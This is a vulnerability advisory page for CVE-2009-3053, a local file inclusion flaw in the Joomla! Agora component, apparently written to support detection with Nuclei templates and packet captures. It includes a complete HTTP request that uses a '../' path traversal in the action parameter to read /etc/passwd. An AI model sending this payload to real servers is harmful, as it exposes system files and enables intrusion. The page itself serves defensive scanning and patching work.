🔙 목록으로 돌아가기

CVE-2009-3053: Joomla! Agora 3.0.0b - Local File Inclusion

TitleJoomla! Agora 3.0.0b - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
RemediationApply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.
CVSS Score6.8
EPSS Score0.01573
CVE IDCVE-2009-3053
CWE IDCWE-22
Tags cve2009 cve joomla lfi edb vuln

🔍 Vulnerability Description

Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.

🌐 HTTP Request

GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-3053.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-3053.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A